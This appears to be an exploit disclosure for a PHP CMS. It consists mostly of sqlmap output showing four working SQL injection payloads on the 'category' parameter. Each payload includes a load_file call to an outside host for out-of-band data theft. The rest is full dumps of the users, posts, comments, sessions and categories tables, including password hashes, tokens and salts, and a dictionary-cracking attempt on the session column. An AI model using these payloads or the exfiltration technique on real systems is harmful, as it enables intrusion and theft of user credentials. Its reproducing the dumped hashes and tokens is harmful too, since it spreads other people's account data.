Multiple SQLi
Infected apps:
http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php
http://pwned_host.com/PHP-CMS-master/search.php Payloads:
---
Parameter: category (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) OR NOT 2848=2848
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 4559 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(4559=4559,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 5517 FROM (SELECT(SLEEP(5)))RgGf)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) UNION ALL SELECT NULL,NULL,CONCAT(0x7170767671,0x797054776f65536e4a79476a475a6f6a4e5156644c427a4a534368524f65764a4e585a4b7258656f,0x716b766b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---Dump:
Database: cms
Table: users
[4 entries]
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| user_id | token | randSalt | username | user_role | user_email | user_image | user_lastname | user_password | user_firstname |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| 17 | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | harshitbansal | admin | example@gmail.com | <blank> | bansal | $2y$10$iusesomecrazystrings2uvgnjnDOGIE6JPA9zzq36EdPnYMUav/S | harshit |
| 20 | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | priyanka | subscriber | example@gmail.com | <blank> | sharma | $2y$12$JWAZjgfODGxhEpsJShk4TO5MHGZ/hUnliFfkwPEvsLkfCJOdJ6ugy | priyanka |
| 22 | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | raghuveer | subscriber | example123@gmail.com | <blank> | singh | $2y$12$kTq/GUEkryih.nT9O77KfeyMp9165ZIqlvu1dEOQLKW8RWv0te46W | raghuveer |
| 26 | <blank> | $2y$10$iusesomecrazystrings22 | raghuveer23 | subscriber | example@gmail.com | <blank> | sharma | $2y$12$23Bqzby0qrz3VfojjbZjT.e4nwL7a68nJk7A4E9bgolDlWmG0lL7m | raghuveer |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
[14:47:11] [INFO] table 'cms.users' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users.csv'
[14:47:11] [INFO] fetching columns for table 'posts' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'posts' in database 'cms'
Database: cms
Table: posts
[9 entries]
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| post_id | post_category_id | post_date | post_tags | post_user | post_image | post_title | post_status | post_content | post_views_count | post_comment_count |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| 1 | 1 | 2018-10-16 | harshit,website | harshitbansal | Boeremark.jpg | Website | draft | you are doing well...\r\n | 1 | 2 |
| 2 | 1 | 2018-10-21 | life,Rajesh,How to work | raghuveer | 544106281_1280x720.jpg | How to work? | draft | you should move on without afraid of what will the curcumstances... | 2 | 0 |
| 3 | 1 | 2018-10-24 | Android, namandeep, mobile, smartphone | priyanka | work-life-balance.jpg | Android | published | Android is a mobile operating system developed by Google, based on a modified version of the Linux kernel and other open source software and designed primarily for touchscreen mobile devices such as smartphones and tablets | 1 | 1 |
| 8 | 1 | 2019-01-10 | life , ctrl | harshitbansal | life-008.jpg | life | published | life has no ctrl+z \r\nhahahaha | 0 | 0 |
| 10 | 1 | 2018-10-21 | time, money | raghuveer | time.jpeg | Time | published | time is money. | 0 | 1 |
| 11 | 1 | 2018-10-21 | goes on, suresh, life | raghuveer | life-expectancy-decline.jpg | Goes on | published | this is the content for this post. | 0 | 0 |
| 12 | 3 | 2018-10-30 | dvjdjsv | vijay | <blank> | fdnbkfd | d,jvsd | bdssvkbdsk | 0 | 0 |
| 13 | 1 | 2018-11-08 | vinod, diwali | vijay | <blank> | diwali | published | <p>hello frnds happy diwali!!</p> | 0 | 0 |
| 14 | 3 | 2019-01-10 | accounts, tanya, bela | priyanka | <blank> | accounts | published | <p>accounting is an identifying process</p> | 0 | 0 |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
[14:47:11] [INFO] table 'cms.posts' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\posts.csv'
[14:47:11] [INFO] fetching columns for table 'comments' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'comments' in database 'cms'
Database: cms
Table: comments
[5 entries]
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| comment_id | comment_post_id | comment_date | comment_email | comment_author | comment_status | comment_content |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| 25 | 1 | 2019-01-16 | example@gmail.com | daau | show | vfadvcv |
| 26 | 1 | 2019-01-16 | example@gmail.com | dinesh | show | vfvfdvfsv |
| 27 | 2 | 2019-01-16 | example@gmail.com | daau | show | fvfvfev |
| 28 | 2 | 2019-01-16 | example@gmail.com | dinesh | show | vfbgrbrt |
| 37 | 2 | 2019-01-19 | example@gmail.com | fdgd | show | cxvfv |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
[14:47:12] [INFO] table 'cms.comments' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\comments.csv'
[14:47:12] [INFO] fetching columns for table 'users_online' in database 'cms'
[14:47:12] [INFO] fetching entries for table 'users_online' in database 'cms'
[14:47:12] [INFO] recognized possible password hashes in column '`session`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[14:47:12] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'D:\CVE\sqlmap\data\txt\nu11secur1ty.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[14:47:12] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:47:12] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[14:47:12] [INFO] starting 8 processes
[14:47:13] [WARNING] no clear password(s) found
Database: cms
Table: users_online
[4 entries]
+----+------------+----------------------------------+
| id | time | session |
+----+------------+----------------------------------+
| 28 | 1541324861 | acqtk6uivrc3mancr6jubo36g8 |
| 40 | 1548511410 | ipke8cras4eauiu50upkm1mocd |
| 41 | 1548401977 | l4qj6m6jv3ges0us7cqvrqovhq |
| 42 | 1562584762 | fd7b414bec20e569f9bd17c4e7ef4c13 |
+----+------------+----------------------------------+
[14:47:13] [INFO] table 'cms.users_online' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users_online.csv'
[14:47:13] [INFO] fetching columns for table 'categories' in database 'cms'
[14:47:14] [INFO] fetching entries for table 'categories' in database 'cms'
Database: cms
Table: categories
[5 entries]
+--------+-------------------------------------------+-----------+---------------+
| cat_id | cat_user | cat_title | cat_creator |
+--------+-------------------------------------------+-----------+---------------+
| 1 | harshit,raghuveer23,raghuveer,vikas,daau, | home | harshitbansal |
| 3 | <blank> | service | harshitbansal |
| 5 | <blank> | contact | harshitbansal |
| 7 | raghuveer, | about | harshitbansal |
| 55 | <blank> | hello | harshitbansal |
+--------+-------------------------------------------+-----------+---------------+
[14:47:14] [INFO] table 'cms.categories' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\categories.csv'
[14:47:14] [INFO] fetched data logged to text files under 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com'
[*] ending @ 14:47:14 /2022-04-11/STATUS Critical! =)
NOTE:
- The PoC will be encrypted, sorry about this dear friends!
- If someone wants to see this work, please write me!
- KR @nu11secur1ty - Penetration Testing Engineer


